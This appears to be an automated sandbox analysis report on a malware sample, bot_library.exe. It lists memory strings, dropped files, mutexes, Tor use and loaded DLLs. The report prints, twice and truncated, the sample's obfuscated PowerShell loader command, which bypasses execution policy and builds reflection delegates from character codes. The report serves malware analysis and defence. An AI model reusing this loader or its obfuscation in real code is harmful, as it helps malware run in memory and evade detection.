Source: bot_library.exe, 00000000.00000002.99964350976.00000246AFC40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99387728702.000002BB3D6C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: bot_library.exe, 00000000.00000002.99964350976.00000246AFC40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99387448650.000002BB3D68A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.99384583822.000002BB355E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99384583822.000002BB3572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.99387448650.000002BB3D68A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99370438729.000002BB257A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.99370438729.000002BB257A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000003.00000002.99370438729.000002BB25571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.99387448650.000002BB3D68A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99370438729.000002BB257A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.99370438729.000002BB257A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: bot_library.exe, 00000000.00000003.99962904781.00000246AE043000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000003.99961894361.00000246AE043000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000003.99962440340.00000246AE043000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000002.99964350976.00000246AFC40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99387728702.000002BB3D6C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%s
Source: powershell.exe, 00000003.00000002.99370438729.000002BB25571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: explorer.exe, 00000004.00000002.99402171669.0000000000400000.00000020.00000400.00020000.00000000.sdmp	String found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.5.2/tor-expert-bundle-windows-x86_6
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://blog.torproject.org/lifecycle-of-a-new-relay
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://blog.torproject.org/lifecycle-of-a-new-relayset
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://blog.torproject.org/v2-deprecation-timeline
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://bridges.torproject.org/status?id=%s
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://bridges.torproject.org/status?id=%suninitialized
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/14917.
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/21155.
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/8742.
Source: powershell.exe, 00000003.00000002.99384583822.000002BB3572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.99384583822.000002BB3572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.99384583822.000002BB3572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: bot_library.exe, 00000000.00000003.99400379023.00000246AFD40000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000002.99965602166.00007FF7FF90C000.00000002.00000001.01000000.00000003.sdmp, bot_library.exe, 00000000.00000000.99352983968.00007FF7FF90C000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.99402171669.0000000000400000.00000020.00000400.00020000.00000000.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://freehaven.net/anonbib/#hs-attack06
Source: powershell.exe, 00000003.00000002.99387448650.000002BB3D68A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99370438729.000002BB257A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.99370438729.000002BB257A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000003.00000002.99370438729.000002BB26624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.99384583822.000002BB355E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99384583822.000002BB3572B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: bot_library.exe, 00000000.00000003.99962904781.00000246AE043000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000003.99961894361.00000246AE043000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000003.99962440340.00000246AE043000.00000004.00000020.00020000.00000000.sdmp, bot_library.exe, 00000000.00000002.99964350976.00000246AFC40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.99387728702.000002BB3D6C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: tor.exe, 00000005.00000003.99614692438.0000028359488000.00000004.00000020.00020000.00000000.sdmp, tor.exe, 00000005.00000003.99601698116.000002835997C000.00000004.00000020.00020000.00000000.sdmp, tor.exe, 00000005.00000003.99595951014.00000283596D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sabotage.net
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://support.torproject.org/faq/staying-anonymous/
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://support.torproject.org/faq/staying-anonymous/alphabetaThis
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.gnu.org/licenses/gpl-3.0.en.html)
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.torproject.org/
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
Source: tor.exe, 00000005.00000000.99524907936.00007FF674C1F000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.torproject.org/documentation.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 159.69.63.226:443 -> 192.168.11.20:49745 version: TLS 1.2

System Summary

Very long command line found

Source: C:\Users\user\Desktop\bot_library.exe	Process created: Commandline size = 6292
Source: C:\Users\user\Desktop\bot_library.exe	Process created: Commandline size = 6292			Jump to behavior

Source: C:\Users\user\Desktop\bot_library.exe	File created: C:\Windows\System32\iRAjHsIkbP.exe			Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	File created: C:\Windows\System32\iRAjHsIkbP.exe\:Zone.Identifier:$DATA			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF832155B5F	3_2_00007FF832155B5F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF832154BC5	3_2_00007FF832154BC5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF8321544B3	3_2_00007FF8321544B3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF8321538DA	3_2_00007FF8321538DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF8321525AD	3_2_00007FF8321525AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF832152DE2	3_2_00007FF832152DE2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF832153A12	3_2_00007FF832153A12
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF832153A3D	3_2_00007FF832153A3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF8321542DB	3_2_00007FF8321542DB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF8321572E5	3_2_00007FF8321572E5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF832224329	3_2_00007FF832224329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF832229231	3_2_00007FF832229231
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF832227A82	3_2_00007FF832227A82

Source: classification engine

Classification label: mal92.evad.winEXE@8/34@1/6

Source: C:\Users\user\Desktop\bot_library.exe

File created: C:\Users\user\Desktop\dll_log.txt

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_03
Source: C:\Users\user\Desktop\bot_library.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Nate_b6f9dcb62f212bd0ddf6f2dd24b976dc

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22nf2lue.nck.ps1

Jump to behavior

Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Windows\explorer.exe			Jump to behavior

Source: bot_library.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\bot_library.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\bot_library.exe

File read: C:\Users\user\Desktop\bot_library.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\bot_library.exe "C:\Users\user\Desktop\bot_library.exe"
Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoProfile -ExecutionPolicy Bypass -Command " function Get-Delegate { Param([Type[]]$eOmkxlVbu2QeAG, [Type]$vIRfTba9LF) $c4CimfTfCCk = [AppDomain]::CurrentDomain.DefineDynamicAssembly( (New-Object Reflection.AssemblyName([char](82)+[char](101)+[char](102)+[char](108)+[char](101)+[char](99)+[char](116)+[char](101)+[char](100)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101))), [Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule( [char](73)+[char](110)+[char](77)+[char](101)+[char](109)+[char](111)+[char](114)+[char](121)+[char](77)+[char](111)+[char](100)+[char](117)+[char](108)+[char](101), $False).DefineType( [char](77)+[char](121)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101)+[char](84)+[char](121)+[char](112)+[char](101), [char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](83)+[char](101)+[char](97)+[char](108)+[char](101)+[char](100)+[char](44)+[char](32)+[char](65)+[char](110)+[char](115)+[char](105)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](65)+[char](117)+[char](116)+[char](111)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115), [MulticastDelegate]) $c4CimfTfCCk.DefineConstructor( [char](82)+[char](84)+[char](83)+[char](112)+[char](101)+[char](99)+[char](105)+[char](97)+[char](108)+[char](78)+[char](97)+[char](109)+[char](101)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99), [Reflection.CallingConventions]::Standard, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) $c4CimfTfCCk.DefineMethod( [char](73)+[char](110)+[char](118)+[char](111)+[char](107)+[char](101), [char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](78)+[char](101)+[char](119)+[char](83)+[char](108)+[char](111)+[char](116)+[char](44)+[char](32)+[char](86)+[char](105)+[char](114)+[char](116)+[char](117)+[char](97)+[char](108), $vIRfTba9LF, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[cha
Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Tor\tor\tor.exe "C:/Tor/tor/tor.exe" -f C:/Tor/torrc
Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoProfile -ExecutionPolicy Bypass -Command " function Get-Delegate { Param([Type[]]$eOmkxlVbu2QeAG, [Type]$vIRfTba9LF) $c4CimfTfCCk = [AppDomain]::CurrentDomain.DefineDynamicAssembly( (New-Object Reflection.AssemblyName([char](82)+[char](101)+[char](102)+[char](108)+[char](101)+[char](99)+[char](116)+[char](101)+[char](100)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101))), [Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule( [char](73)+[char](110)+[char](77)+[char](101)+[char](109)+[char](111)+[char](114)+[char](121)+[char](77)+[char](111)+[char](100)+[char](117)+[char](108)+[char](101), $False).DefineType( [char](77)+[char](121)+[char](68)+[char](101)+[char](108)+[char](101)+[char](103)+[char](97)+[char](116)+[char](101)+[char](84)+[char](121)+[char](112)+[char](101), [char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](83)+[char](101)+[char](97)+[char](108)+[char](101)+[char](100)+[char](44)+[char](32)+[char](65)+[char](110)+[char](115)+[char](105)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115)+[char](44)+[char](32)+[char](65)+[char](117)+[char](116)+[char](111)+[char](67)+[char](108)+[char](97)+[char](115)+[char](115), [MulticastDelegate]) $c4CimfTfCCk.DefineConstructor( [char](82)+[char](84)+[char](83)+[char](112)+[char](101)+[char](99)+[char](105)+[char](97)+[char](108)+[char](78)+[char](97)+[char](109)+[char](101)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99), [Reflection.CallingConventions]::Standard, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[char](97)+[char](103)+[char](101)+[char](100)) $c4CimfTfCCk.DefineMethod( [char](73)+[char](110)+[char](118)+[char](111)+[char](107)+[char](101), [char](80)+[char](117)+[char](98)+[char](108)+[char](105)+[char](99)+[char](44)+[char](32)+[char](72)+[char](105)+[char](100)+[char](101)+[char](66)+[char](121)+[char](83)+[char](105)+[char](103)+[char](44)+[char](32)+[char](78)+[char](101)+[char](119)+[char](83)+[char](108)+[char](111)+[char](116)+[char](44)+[char](32)+[char](86)+[char](105)+[char](114)+[char](116)+[char](117)+[char](97)+[char](108), $vIRfTba9LF, $eOmkxlVbu2QeAG).SetImplementationFlags([char](82)+[char](117)+[char](110)+[char](116)+[char](105)+[char](109)+[char](101)+[char](44)+[char](32)+[char](77)+[char](97)+[char](110)+[cha	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Process created: C:\Tor\tor\tor.exe "C:/Tor/tor/tor.exe" -f C:/Tor/torrc	Jump to behavior

Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\Desktop\bot_library.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: structuredquery.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswb7.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.search.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Tor\tor\tor.exe	Section loaded: dnsapi.dll	Jump to behavior

Source: C:\Windows\explorer.exe

